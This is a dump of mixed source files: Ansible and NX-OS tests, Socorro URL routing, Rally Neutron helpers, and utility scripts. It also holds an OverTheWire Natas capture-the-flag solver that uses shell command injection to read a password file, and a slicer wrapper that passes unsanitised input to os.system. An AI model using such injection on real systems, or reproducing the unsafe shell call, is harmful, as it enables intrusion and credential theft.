# test with no unreachable in result
tr = TaskResult(mock_host, mock_task, dict())
self.assertFalse(tr.is_unreachable())
# test with unreachable in the result
tr = TaskResult(mock_host, mock_task, dict(unreachable=True))
self.assertTrue(tr.is_unreachable())
# test with multiple results but none unreachable
mock_task.loop = 'foo'
tr = TaskResult(mock_host, mock_task, dict(results=[dict(foo='bar'), dict(bam='baz'), True]))
self.assertFalse(tr.is_unreachable())
# test with multiple results and one unreachable
mock_task.loop = 'foo'
tr = TaskResult(mock_host, mock_task, dict(results=[dict(unreachable=False), dict(unreachable=True), dict(some_key=False)]))
self.assertTrue(tr.is_unreachable())
def test_task_result_is_failed(self):
mock_host = MagicMock()
mock_task = MagicMock()
# test with no failed in result
tr = TaskResult(mock_host, mock_task, dict())
self.assertFalse(tr.is_failed())
# test failed result with rc values (should not matter)
tr = TaskResult(mock_host, mock_task, dict(rc=0))
self.assertFalse(tr.is_failed())
tr = TaskResult(mock_host, mock_task, dict(rc=1))
self.assertFalse(tr.is_failed())
# test with failed in result
tr = TaskResult(mock_host, mock_task, dict(failed=True))
self.assertTrue(tr.is_failed())
# test with failed_when in result
tr = TaskResult(mock_host, mock_task, dict(failed_when_result=True))
self.assertTrue(tr.is_failed())
def test_task_result_no_log(self):
mock_host = MagicMock()
mock_task = MagicMock()
# no_log should remove secrets
tr = TaskResult(mock_host, mock_task, dict(_ansible_no_log=True, secret='DONTSHOWME'))
clean = tr.clean_copy()
self.assertTrue('secret' not in clean._result)
def test_task_result_no_log_preserve(self):
mock_host = MagicMock()
mock_task = MagicMock()
# no_log should not remove preserved keys
tr = TaskResult(
mock_host,
mock_task,
dict(
_ansible_no_log=True,
retries=5,
attempts=5,
changed=False,
foo='bar',
)
)
clean = tr.clean_copy()
self.assertTrue('retries' in clean._result)
self.assertTrue('attempts' in clean._result)
self.assertTrue('changed' in clean._result)
self.assertTrue('foo' not in clean._result)
|
lonnen/socorro
|
refs/heads/master
|
webapp-django/crashstats/urls.py
|
1
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import os
from django.conf import settings
from django.conf.urls import include, url
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from django.views.generic.base import RedirectView
from django.views.static import serve
from crashstats.manage import admin_site
from crashstats.crashstats.monkeypatches import patch
patch()
handler500 = 'crashstats.crashstats.views.handler500'
handler404 = 'crashstats.crashstats.views.handler404'
urlpatterns = [
url(r'^(?P<path>contribute\.json)$', serve, {
'document_root': os.path.join(settings.ROOT, '..'),
}),
url(r'^(?P<path>favicon\.ico)$', serve, {
'document_root': os.path.join(settings.ROOT, 'crashstats', 'crashstats', 'static', 'img'),
}),
url(r'', include('crashstats.crashstats.urls', namespace='crashstats')),
url(r'', include('crashstats.supersearch.urls', namespace='supersearch')),
url(r'', include('crashstats.exploitability.urls', namespace='exploitability')),
url(r'', include('crashstats.monitoring.urls', namespace='monitoring')),
url(r'^signature/', include('crashstats.signature.urls', namespace='signature')),
url(r'^topcrashers/', include('crashstats.topcrashers.urls', namespace='topcrashers')),
url(r'^sources/', include('crashstats.sources.urls', namespace='sources')),
url(r'^api/tokens/', include('crashstats.tokens.urls', namespace='tokens')),
url(r'^api/', include('crashstats.api.urls', namespace='api')),
# redirect all symbols/ requests to Tecken
url(r'^symbols/.*',
RedirectView.as_view(url='https://symbols.mozilla.org/'),
name='redirect-to-tecken'),
url(r'^profile/', include('crashstats.profile.urls', namespace='profile')),
url(r'^documentation/', include('crashstats.documentation.urls', namespace='documentation')),
# Static pages in Django admin
url(r'^siteadmin/', include('crashstats.manage.admin_urls', namespace='siteadmin')),
# Django-model backed pages in Django admin
url(r'^siteadmin/', admin_site.site.urls),
url(r'^oidc/', include('mozilla_django_oidc.urls')),
]
# In DEBUG mode, serve media files through Django.
if settings.DEBUG:
urlpatterns += staticfiles_urlpatterns()
|
vganapath/rally
|
refs/heads/master
|
rally/plugins/openstack/scenarios/neutron/utils.py
|
1
|
# Copyright 2014: Intel Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
from rally.common.i18n import _
from rally.common import logging
from rally import exceptions
from rally.plugins.openstack import scenario
from rally.plugins.openstack.wrappers import network as network_wrapper
from rally.task import atomic
LOG = logging.getLogger(__name__)
class NeutronScenario(scenario.OpenStackScenario):
"""Base class for Neutron scenarios with basic atomic actions."""
SUBNET_IP_VERSION = 4
# TODO(rkiran): modify in case LBaaS-v2 requires
LB_METHOD = "ROUND_ROBIN"
LB_PROTOCOL = "HTTP"
LB_PROTOCOL_PORT = 80
HM_TYPE = "PING"
HM_MAX_RETRIES = 3
HM_DELAY = 20
HM_TIMEOUT = 10
def _get_network_id(self, network, **kwargs):
"""Get Neutron network ID for the network name.
:param network: str, network name/id
:param kwargs: dict, network options
:returns: str, Neutron network-id
"""
networks = self._list_networks(atomic_action=False)
for net in networks:
if (net["name"] == network) or (net["id"] == network):
return net["id"]
msg = (_("Network %s not found.") % network)
raise exceptions.NotFoundException(message=msg)
@atomic.action_timer("neutron.create_network")
def _create_network(self, network_create_args):
"""Create neutron network.
:param network_create_args: dict, POST /v2.0/networks request options
:returns: neutron network dict
"""
network_create_args["name"] = self.generate_random_name()
return self.clients("neutron").create_network(
{"network": network_create_args})
@atomic.optional_action_timer("neutron.list_networks")
def _list_networks(self, **kwargs):
"""Return user networks list.
:param atomic_action: True if this is an atomic action. added
and handled by the
optional_action_timer() decorator
:param kwargs: network list options
"""
return self.clients("neutron").list_networks(**kwargs)["networks"]
@atomic.action_timer("neutron.update_network")
def _update_network(self, network, network_update_args):
"""Update the network.
This atomic function updates the network with network_update_args.
:param network: Network object
:param network_update_args: dict, POST /v2.0/networks update options
:returns: updated neutron network dict
"""
network_update_args["name"] = self.generate_random_name()
body = {"network": network_update_args}
return self.clients("neutron").update_network(
network["network"]["id"], body)
@atomic.action_timer("neutron.delete_network")
def _delete_network(self, network):
"""Delete neutron network.
:param network: Network object
"""
self.clients("neutron").delete_network(network["id"])
@atomic.action_timer("neutron.create_subnet")
def _create_subnet(self, network, subnet_create_args, start_cidr=None):
"""Create neutron subnet.
:param network: neutron network dict
:param subnet_create_args: POST /v2.0/subnets request options
:returns: neutron subnet dict
"""
network_id = network["network"]["id"]
if not subnet_create_args.get("cidr"):
start_cidr = start_cidr or "10.2.0.0/24"
subnet_create_args["cidr"] = (
network_wrapper.generate_cidr(start_cidr=start_cidr))
subnet_create_args["network_id"] = network_id
subnet_create_args["name"] = self.generate_random_name()
subnet_create_args.setdefault("ip_version", self.SUBNET_IP_VERSION)
return self.clients("neutron").create_subnet(
{"subnet": subnet_create_args})
@atomic.action_timer("neutron.list_subnets")
def _list_subnets(self):
"""Returns user subnetworks list."""
return self.clients("neutron").list_subnets()["subnets"]
@atomic.action_timer("neutron.update_subnet")
def _update_subnet(self, subnet, subnet_update_args):
"""Update the neutron subnet.
This atomic function updates the subnet with subnet_update_args.
:param subnet: Subnet object
:param subnet_update_args: dict, PUT /v2.0/subnets update options
:returns: updated neutron subnet dict
"""
subnet_update_args["name"] = self.generate_random_name()
body = {"subnet": subnet_update_args}
return self.clients("neutron").update_subnet(
subnet["subnet"]["id"], body)
@atomic.action_timer("neutron.delete_subnet")
def _delete_subnet(self, subnet):
"""Delete neutron subnet
:param subnet: Subnet object
"""
self.clients("neutron").delete_subnet(subnet["subnet"]["id"])
@atomic.action_timer("neutron.create_router")
def _create_router(self, router_create_args, external_gw=False):
"""Create neutron router.
:param router_create_args: POST /v2.0/routers request options
:returns: neutron router dict
"""
router_create_args["name"] = self.generate_random_name()
if external_gw:
for network in self._list_networks():
if network.get("router:external"):
external_network = network
gw_info = {"network_id": external_network["id"],
"enable_snat": True}
router_create_args.setdefault("external_gateway_info",
gw_info)
return self.clients("neutron").create_router(
{"router": router_create_args})
@atomic.action_timer("neutron.list_routers")
def _list_routers(self):
"""Returns user routers list."""
return self.clients("neutron").list_routers()["routers"]
@atomic.action_timer("neutron.delete_router")
def _delete_router(self, router):
"""Delete neutron router
:param router: Router object
"""
self.clients("neutron").delete_router(router["router"]["id"])
@atomic.action_timer("neutron.update_router")
def _update_router(self, router, router_update_args):
"""Update the neutron router.
This atomic function updates the router with router_update_args.
:param router: dict, neutron router
:param router_update_args: dict, PUT /v2.0/routers update options
:returns: updated neutron router dict
"""
router_update_args["name"] = self.generate_random_name()
body = {"router": router_update_args}
return self.clients("neutron").update_router(
router["router"]["id"], body)
@atomic.action_timer("neutron.create_port")
def _create_port(self, network, port_create_args):
"""Create neutron port.
:param network: neutron network dict
:param port_create_args: POST /v2.0/ports request options
:returns: neutron port dict
"""
port_create_args["network_id"] = network["network"]["id"]
port_create_args["name"] = self.generate_random_name()
return self.clients("neutron").create_port({"port": port_create_args})
@atomic.action_timer("neutron.list_ports")
def _list_ports(self):
"""Return user ports list."""
return self.clients("neutron").list_ports()["ports"]
@atomic.action_timer("neutron.update_port")
def _update_port(self, port, port_update_args):
"""Update the neutron port.
This atomic function updates port with port_update_args.
:param port: dict, neutron port
:param port_update_args: dict, PUT /v2.0/ports update options
:returns: updated neutron port dict
"""
port_update_args["name"] = self.generate_random_name()
body = {"port": port_update_args}
return self.clients("neutron").update_port(port["port"]["id"], body)
@atomic.action_timer("neutron.delete_port")
def _delete_port(self, port):
"""Delete neutron port.
:param port: Port object
"""
self.clients("neutron").delete_port(port["port"]["id"])
@logging.log_deprecated_args(_("network_create_args is deprecated; "
"use the network context instead"),
"0.1.0", "network_create_args")
def _get_or_create_network(self, network_create_args=None):
"""Get a network from context, or create a new one.
This lets users either create networks with the 'network'
context, provide existing networks with the 'existing_network'
context, or let the scenario create a default network for
them. Running this without one of the network contexts is
deprecated.
:param network_create_args: Deprecated way to provide network
creation args; use the network
context instead.
:returns: Network dict
"""
if "networks" in self.context["tenant"]:
return {"network":
random.choice(self.context["tenant"]["networks"])}
else:
LOG.warning(_("Running this scenario without either the 'network' "
"or 'existing_network' context is deprecated"))
return self._create_network(network_create_args or {})
def _create_subnets(self, network,
subnet_create_args=None,
subnet_cidr_start=None,
subnets_per_network=1):
"""Create <count> new subnets in the given network.
:param network: network to create subnets in
:param subnet_create_args: dict, POST /v2.0/subnets request options
:param subnet_cidr_start: str, start value for subnets CIDR
:param subnets_per_network: int, number of subnets for one network
:returns: List of subnet dicts
"""
return [self._create_subnet(network, subnet_create_args or {},
subnet_cidr_start)
for i in range(subnets_per_network)]
def _create_network_and_subnets(self,
network_create_args=None,
subnet_create_args=None,
subnets_per_network=1,
subnet_cidr_start="1.0.0.0/24"):
"""Create network and subnets.
:param network_create_args: dict, POST /v2.0/networks request options
:param subnet_create_args: dict, POST /v2.0/subnets request options
:param subnets_per_network: int, number of subnets for one network
:param subnet_cidr_start: str, start value for subnets CIDR
:returns: tuple of result network and subnets list
"""
network = self._create_network(network_create_args or {})
subnets = self._create_subnets(network, subnet_create_args,
subnet_cidr_start, subnets_per_network)
return network, subnets
def _create_network_structure(self, network_create_args=None,
subnet_create_args=None,
subnet_cidr_start=None,
subnets_per_network=None,
router_create_args=None):
"""Create a network and a given number of subnets and routers.
:param network_create_args: dict, POST /v2.0/networks request options
:param subnet_create_args: dict, POST /v2.0/subnets request options
:param subnet_cidr_start: str, start value for subnets CIDR
:param subnets_per_network: int, number of subnets for one network
:param router_create_args: dict, POST /v2.0/routers request options
:returns: tuple of (network, subnets, routers)
"""
network = self._get_or_create_network(network_create_args)
subnets = self._create_subnets(network, subnet_create_args,
subnet_cidr_start,
subnets_per_network)
routers = []
for subnet in subnets:
router = self._create_router(router_create_args or {})
self._add_interface_router(subnet["subnet"],
router["router"])
routers.append(router)
return (network, subnets, routers)
@atomic.action_timer("neutron.add_interface_router")
def _add_interface_router(self, subnet, router):
"""Connect subnet to router.
:param subnet: dict, neutron subnet
:param router: dict, neutron router
"""
self.clients("neutron").add_interface_router(
router["id"], {"subnet_id": subnet["id"]})
@atomic.action_timer("neutron.remove_interface_router")
def _remove_interface_router(self, subnet, router):
"""Remove subnet from router
:param subnet: dict, neutron subnet
:param router: dict, neutron router
"""
self.clients("neutron").remove_interface_router(
router["id"], {"subnet_id": subnet["id"]})
@atomic.optional_action_timer("neutron.create_loadbalancer")
def _create_loadbalancer(self, subnet_id, **lb_create_args):
"""Create LB loadbalancer(v2)
:param subnet_id: str, neutron subnet-id
:param pool_create_args: dict, POST /lb/pools request options
:param atomic_action: True if this is an atomic action. added
and handled by the
optional_action_timer() decorator
:returns: dict, neutron lb pool
"""
args = {"name": self.generate_random_name(),
"vip_subnet_id": subnet_id}
args.update(lb_create_args)
return self.clients("neutron").create_loadbalancer({"loadbalancer": args})
def _create_v2_loadbalancer(self, networks, **lb_create_args):
"""Create LB loadbalancer(v2)
:param networks: list, neutron networks
:param pool_create_args: dict, POST /lb/pools request options
:returns: list, neutron lb pools
"""
subnets = []
lb = []
for net in networks:
subnets.extend(net.get("subnets", []))
with atomic.ActionTimer(self, "neutron.create_%s_lbs" %
len(subnets)):
for subnet_id in subnets:
lb.append(self._create_loadbalancer(
subnet_id, atomic_action=False, **lb_create_args))
return lb
@atomic.action_timer("neutron.delete_loadbalancer")
def _delete_v2_loadbalancer(self, lb):
"""Delete neutron vip.
:param vip: neutron Virtual IP object
"""
self.clients("neutron").delete_loadbalancer(lb)
@atomic.action_timer("neutron.create_listener")
def _create_v2_listener(self, lb, **listener_create_args):
"""Create Listener(lbaasv2)
:parm pool: dict, neutron lb-pool
:parm vip_create_args: dict, POST /lb/vips request options
:returns: dict, neutron lb vip
"""
args = {"protocol": self.LB_PROTOCOL,
"protocol_port": self.LB_PROTOCOL_PORT,
"name": self.generate_random_name(),
"loadbalancer_id": lb["loadbalancer"]["id"]}
args.update(listener_create_args)
return self.clients("neutron").create_listener({"listener": args})
@atomic.action_timer("neutron.delete_listener")
def _delete_v2_listener(self, listener):
"""Delete neutron vip.
:param vip: neutron Virtual IP object
"""
self.clients("neutron").delete_listener(listener)
@atomic.optional_action_timer("neutron.create_lbaas_pool")
def _create_v2_pool(self, listener, **pool_create_args):
"""Create LB pool(v2)
:param subnet_id: str, neutron subnet-id
:param pool_create_args: dict, POST /lb/pools request options
:param atomic_action: True if this is an atomic action. added
and handled by the
optional_action_timer() decorator
:returns: dict, neutron lb pool
"""
args = {"lb_algorithm": self.LB_METHOD,
"protocol": self.LB_PROTOCOL,
"name": self.generate_random_name(),
"listener_id": listener["listener"]["id"]}
args.update(pool_create_args)
return self.clients("neutron").create_lbaas_pool({"pool": args})
@atomic.action_timer("neutron.delete_lbaas_pool")
def _delete_v2_pool(self, pool):
"""Delete loadbalancer pool.
:param pool: lbaas pool to delete
"""
self.clients("neutron").delete_lbaas_pool(pool)
@atomic.optional_action_timer("neutron.create_lbaas_member")
def _create_v2_pool_member(self, subnet_id, pool, **mem_create_args):
"""Create LB pool member (v2)
:param subnet_id: str, neutron subnet-id
:param pool_create_args: dict, POST /lb/pools request options
:param atomic_action: True if this is an atomic action. added
and handled by the
optional_action_timer() decorator
:returns: dict, neutron lb pool
"""
args = {"subnet_id": subnet_id,
"protocol_port": self.LB_PROTOCOL_PORT}
args.update(mem_create_args)
return self.clients("neutron").create_lbaas_member(pool["pool"]["id"], {"member": args})
@atomic.action_timer("neutron.delete_pool_member")
def _delete_v2_pool_member(self, member, pool):
"""Delete lbaas pool member.
:param member: lbaas member to delete
:param pool: lbaas pool the member belongs to
"""
self.clients("neutron").delete_lbaas_member(member, pool)
@atomic.optional_action_timer("neutron.create_pool")
def _create_lb_pool(self, subnet_id, **pool_create_args):
"""Create LB pool(v1)
:param subnet_id: str, neutron subnet-id
:param pool_create_args: dict, POST /lb/pools request options
:param atomic_action: True if this is an atomic action. added
and handled by the
optional_action_timer() decorator
:returns: dict, neutron lb pool
"""
args = {"lb_method": self.LB_METHOD,
"protocol": self.LB_PROTOCOL,
"name": self.generate_random_name(),
"subnet_id": subnet_id}
args.update(pool_create_args)
return self.clients("neutron").create_pool({"pool": args})
def _create_v1_pools(self, networks, **pool_create_args):
"""Create LB pools(v1)
:param networks: list, neutron networks
:param pool_create_args: dict, POST /lb/pools request options
:returns: list, neutron lb pools
"""
subnets = []
pools = []
for net in networks:
subnets.extend(net.get("subnets", []))
with atomic.ActionTimer(self, "neutron.create_%s_pools" %
len(subnets)):
for subnet_id in subnets:
pools.append(self._create_lb_pool(
subnet_id, atomic_action=False, **pool_create_args))
return pools
@atomic.action_timer("neutron.list_pools")
def _list_v1_pools(self, **kwargs):
"""Return user lb pool list(v1)."""
return self.clients("neutron").list_pools(**kwargs)
@atomic.action_timer("neutron.delete_pool")
def _delete_v1_pool(self, pool):
"""Delete neutron pool.
:param pool: Pool object
"""
self.clients("neutron").delete_pool(pool["id"])
@atomic.action_timer("neutron.update_pool")
def _update_v1_pool(self, pool, **pool_update_args):
"""Update pool.
This atomic function updates the pool with pool_update_args.
:param pool: Pool object
:param pool_update_args: dict, POST /lb/pools update options
:returns: updated neutron pool dict
"""
pool_update_args["name"] = self.generate_random_name()
body = {"pool": pool_update_args}
return self.clients("neutron").update_pool(pool["pool"]["id"], body)
def _create_v1_vip(self, pool, **vip_create_args):
"""Create VIP(v1)
:param pool: dict, neutron lb-pool
:param vip_create_args: dict, POST /lb/vips request options
:returns: dict, neutron lb vip
"""
args = {"protocol": self.LB_PROTOCOL,
"protocol_port": self.LB_PROTOCOL_PORT,
"name": self.generate_random_name(),
"pool_id": pool["pool"]["id"],
"subnet_id": pool["pool"]["subnet_id"]}
args.update(vip_create_args)
return self.clients("neutron").create_vip({"vip": args})
@atomic.action_timer("neutron.list_vips")
def _list_v1_vips(self, **kwargs):
"""Return user lb vip list(v1)."""
return self.clients("neutron").list_vips(**kwargs)
@atomic.action_timer("neutron.delete_vip")
def _delete_v1_vip(self, vip):
"""Delete neutron vip.
:param vip: neutron Virtual IP object
"""
self.clients("neutron").delete_vip(vip["id"])
@atomic.action_timer("neutron.update_vip")
def _update_v1_vip(self, vip, **vip_update_args):
"""Updates vip.
This atomic function updates vip name and admin state
:param vip: Vip object
:param vip_update_args: dict, POST /lb/vips update options
:returns: updated neutron vip dict
"""
vip_update_args["name"] = self.generate_random_name()
body = {"vip": vip_update_args}
return self.clients("neutron").update_vip(vip["vip"]["id"], body)
@atomic.action_timer("neutron.create_floating_ip")
def _create_floatingip(self, floating_network, **floating_ip_args):
"""Create floating IP with floating_network.
:param floating_network: str, external network to create floating IP
:param floating_ip_args: dict, POST /floatingips create options
:returns: dict, neutron floating IP
"""
floating_network_id = self._get_network_id(
floating_network)
args = {"floating_network_id": floating_network_id}
args.update(floating_ip_args)
return self.clients("neutron").create_floatingip({"floatingip": args})
@atomic.action_timer("neutron.list_floating_ips")
def _list_floating_ips(self, **kwargs):
"""Return floating IPs list."""
return self.clients("neutron").list_floatingips(**kwargs)
@atomic.action_timer("neutron.delete_floating_ip")
def _delete_floating_ip(self, floating_ip):
"""Delete floating IP.
:param floating_ip: dict, floating IP object
"""
return self.clients("neutron").delete_floatingip(floating_ip["id"])
@atomic.optional_action_timer("neutron.create_healthmonitor")
def _create_v1_healthmonitor(self, **healthmonitor_create_args):
"""Create LB healthmonitor.
This atomic function creates healthmonitor with the provided
healthmonitor_create_args.
:param atomic_action: True if this is an atomic action. added
and handled by the
optional_action_timer() decorator
:param healthmonitor_create_args: dict, POST /lb/healthmonitors
:returns: neutron healthmonitor dict
"""
args = {"type": self.HM_TYPE,
"delay": self.HM_DELAY,
"max_retries": self.HM_MAX_RETRIES,
"timeout": self.HM_TIMEOUT}
args.update(healthmonitor_create_args)
return self.clients("neutron").create_health_monitor(
{"health_monitor": args})
@atomic.action_timer("neutron.list_healthmonitors")
def _list_v1_healthmonitors(self, **kwargs):
"""List LB healthmonitors.
This atomic function lists all healthmonitors.
:param kwargs: optional parameters
:returns: neutron lb healthmonitor list
"""
return self.clients("neutron").list_health_monitors(**kwargs)
@atomic.action_timer("neutron.delete_healthmonitor")
def _delete_v1_healthmonitor(self, healthmonitor):
"""Delete neutron healthmonitor.
:param healthmonitor: neutron healthmonitor dict
"""
self.clients("neutron").delete_health_monitor(healthmonitor["id"])
@atomic.action_timer("neutron.update_healthmonitor")
def _update_v1_healthmonitor(self, healthmonitor,
**healthmonitor_update_args):
"""Update neutron healthmonitor.
:param healthmonitor: neutron lb healthmonitor dict
:param healthmonitor_update_args: POST /lb/healthmonitors
update options
:returns: updated neutron lb healthmonitor dict
"""
body = {"health_monitor": healthmonitor_update_args}
return self.clients("neutron").update_health_monitor(
healthmonitor["health_monitor"]["id"], body)
@atomic.action_timer("neutron.create_security_group")
def _create_security_group(self, **security_group_create_args):
"""Create Neutron security-group.
:param security_group_create_args: dict, POST /v2.0/security-groups
request options
:returns: dict, neutron security-group
"""
security_group_create_args["name"] = self.generate_random_name()
return self.clients("neutron").create_security_group(
{"security_group": security_group_create_args})
@atomic.action_timer("neutron.delete_security_group")
def _delete_security_group(self, security_group):
"""Delete Neutron security group.
:param security_group: dict, neutron security_group
"""
return self.clients("neutron").delete_security_group(
security_group["security_group"]["id"])
@atomic.action_timer("neutron.list_security_groups")
def _list_security_groups(self, **kwargs):
"""Return list of Neutron security groups."""
return self.clients("neutron").list_security_groups(**kwargs)
@atomic.action_timer("neutron.update_security_group")
def _update_security_group(self, security_group,
**security_group_update_args):
"""Update Neutron security-group.
:param security_group: dict, neutron security_group
:param security_group_update_args: dict, POST /v2.0/security-groups
update options
:returns: dict, updated neutron security-group
"""
security_group_update_args["name"] = self.generate_random_name()
body = {"security_group": security_group_update_args}
return self.clients("neutron").update_security_group(
security_group["security_group"]["id"], body)
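# --- Illustrative usage (not part of the original module) ---
# A hypothetical scenario built on the helpers above might look like the
# sketch below; the class name and parameters are assumptions for
# illustration only, not shipped rally plugins.
#
#     class CreateAndListSubnets(NeutronScenario):
#         def run(self, network_create_args=None, subnet_create_args=None,
#                 subnets_per_network=2):
#             network, subnets = self._create_network_and_subnets(
#                 network_create_args, subnet_create_args,
#                 subnets_per_network)
#             self._list_subnets()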
|
Arcalder/dli3d
|
refs/heads/master
|
lib/slices.py
|
1
|
#-------------------------------------------------------------------------------
# This file is part of 'DlI3D'.
#
# Copyright (C) 2012 by
# Ariel Calderón, Cesar Campos, Eduardo Escobar, Alvaro Faundez, Alonso Gaete,
# Felipe Gonzalez, Rodrigo Gonzalez, Roberto Riquelme, Tamara Rivera,
# Leonardo Rojas, Maximilian Santander
# DlI3D: https://github.com/afaundez/dli3d
#
# 'DlI3D' is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# 'DlI3D' is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with 'DlI3D'. If not, see <http://www.gnu.org/licenses/>.
#
#-------------------------------------------------------------------------------
import os
import subprocess
#sys.path.append(os.path.join(os.getcwd(), '..', 'lib'))
def createSlices(height,output,path,step,layer_thickness):
#height=5
#output="trololo.jpg"
#path=os.path.abspath("C:/Users/Leonardo/Documents/Helix.stl")
#print path
#step=0.5
#layer_thickness=10
dir=output[:(-len(output)+output.find('.'))]
#print dir
#if not (os.path.exists(dir)):
# os.mkdir(dir)
os.chdir(os.path.join('..', 'bin', 'slicer'))
print os.getcwd()
#os.system("slice "+path+" -z0,"+str(height)+",0.5 -o "+output)
cmd ="slice "+path+" -z0,"+str(height)+","+str(step)+" -l "+str(layer_thickness)+" --width=800 --height=600 --background=black --core=white -o "+output
print cmd
os.system(cmd)
#height = raw_input("Enter height: ")
#output = raw_input("Enter output: ")
#path = raw_input("Enter stl absolute path: ")
#step = raw_input("Enter step: ")
#layer_thickness = raw_input("Enter layer thickness: ")
#createSlices(height,output,path,step,layer_thickness)
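# Example invocation (hypothetical values, mirroring the commented-out
# prompts above; note the function chdirs into ../bin/slicer before
# shelling out to the slicer binary):
#
#     createSlices(5, "model.jpg", os.path.abspath("models/Helix.stl"), 0.5, 10)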
|
40223149/2015cd_midterm
|
refs/heads/master
|
static/Brython3.1.1-20150328-091302/Lib/pickle.py
|
1265
|
from json import *
|
koki-sato/capture-the-flag
|
refs/heads/master
|
write-ups/OverTheWire/Natas/solver/natas16.py
|
1
|
# -*- coding: utf-8 -*-
import string
import requests
URL = 'http://natas16.natas.labs.overthewire.org/?needle=a&submit=Search'
AUTH = ('natas16', 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh')
def main():
password = ''
while True:
for c in string.printable:
params = { 'needle': "$(grep -E ^" + password + c + " /etc/natas_webpass/natas17)Yankees", 'submit': 'Search' }
r = requests.get(URL, auth=AUTH, params=params)
if not 'Yankees' in r.text:
password += c
print "[+] password: %s" % password
break
if len(password) == 32:
break
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
pass
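# How the oracle works (explanatory note, not in the original write-up):
# the page interpolates `needle` into a shell command, so
# $(grep -E ^<guess> /etc/natas_webpass/natas17)Yankees makes the literal
# string "Yankees" vanish from the output whenever the grep inside the
# command substitution matches -- i.e. whenever <guess> is a correct
# password prefix. Each round therefore extends the known prefix by one
# printable character until all 32 characters are recovered.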
|
dekkersarjan/netcoin-work
|
refs/heads/master
|
share/qt/extract_strings_qt.py
|
2945
|
#!/usr/bin/python
'''
Extract _("...") strings for translation and convert to Qt4 stringdefs so that
they can be picked up by Qt linguist.
'''
from subprocess import Popen, PIPE
import glob
import operator
OUT_CPP="src/qt/bitcoinstrings.cpp"
EMPTY=['""']
def parse_po(text):
"""
Parse 'po' format produced by xgettext.
Return a list of (msgid,msgstr) tuples.
"""
messages = []
msgid = []
msgstr = []
in_msgid = False
in_msgstr = False
for line in text.split('\n'):
line = line.rstrip('\r')
if line.startswith('msgid '):
if in_msgstr:
messages.append((msgid, msgstr))
in_msgstr = False
# message start
in_msgid = True
msgid = [line[6:]]
elif line.startswith('msgstr '):
in_msgid = False
in_msgstr = True
msgstr = [line[7:]]
elif line.startswith('"'):
if in_msgid:
msgid.append(line)
if in_msgstr:
msgstr.append(line)
if in_msgstr:
messages.append((msgid, msgstr))
return messages
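# A minimal example of the format parse_po() consumes (assumed input for
# illustration):
#
#     >>> parse_po('msgid "hello"\nmsgstr "bonjour"\n')
#     [(['"hello"'], ['"bonjour"'])]
#
# i.e. each message comes back as its raw quoted lines, continuation
# strings included, ready to be re-joined when writing the .cpp below.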
files = glob.glob('src/*.cpp') + glob.glob('src/*.h')
# xgettext -n --keyword=_ $FILES
child = Popen(['xgettext','--output=-','-n','--keyword=_'] + files, stdout=PIPE)
(out, err) = child.communicate()
messages = parse_po(out)
f = open(OUT_CPP, 'w')
f.write("""#include <QtGlobal>
// Automatically generated by extract_strings.py
#ifdef __GNUC__
#define UNUSED __attribute__((unused))
#else
#define UNUSED
#endif
""")
f.write('static const char UNUSED *bitcoin_strings[] = {\n')
messages.sort(key=operator.itemgetter(0))
for (msgid, msgstr) in messages:
if msgid != EMPTY:
f.write('QT_TRANSLATE_NOOP("bitcoin-core", %s),\n' % ('\n'.join(msgid)))
f.write('};')
f.close()
|
alikins/ansible
|
refs/heads/devel
|
test/units/modules/network/nxos/test_nxos_vpc_interface.py
|
57
|
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.compat.tests.mock import patch
from ansible.modules.network.nxos import nxos_vpc_interface
from .nxos_module import TestNxosModule, load_fixture, set_module_args
class TestNxosVpcModule(TestNxosModule):
module = nxos_vpc_interface
def setUp(self):
super(TestNxosVpcModule, self).setUp()
self.mock_load_config = patch('ansible.modules.network.nxos.nxos_vpc_interface.load_config')
self.load_config = self.mock_load_config.start()
self.mock_get_config = patch('ansible.modules.network.nxos.nxos_vpc_interface.get_config')
self.get_config = self.mock_get_config.start()
self.mock_run_commands = patch('ansible.modules.network.nxos.nxos_vpc_interface.run_commands')
self.run_commands = self.mock_run_commands.start()
def tearDown(self):
super(TestNxosVpcModule, self).tearDown()
self.mock_load_config.stop()
self.mock_get_config.stop()
self.mock_run_commands.stop()
def load_fixtures(self, commands=None, device=''):
def load_from_file(*args, **kwargs):
module, commands = args
output = list()
for command in commands:
filename = str(command).split(' | ')[0].replace(' ', '_')
output.append(load_fixture('nxos_vpc_interface', filename))
return output
self.run_commands.side_effect = load_from_file
self.load_config.return_value = None
def test_nxos_vpc_interface_absent(self):
set_module_args(dict(portchannel=10, vpc=100, state='absent'))
result = self.execute_module(changed=True)
self.assertEqual(result['commands'], ['interface port-channel10', 'no vpc'])
def test_nxos_vpc_interface_present(self):
set_module_args(dict(portchannel=20, vpc=200, state='present'))
result = self.execute_module(changed=True)
self.assertEqual(result['commands'], ['interface port-channel20', 'vpc 200'])
|
delletenebre/xbmc-addon-kilogramme
|
refs/heads/master
|
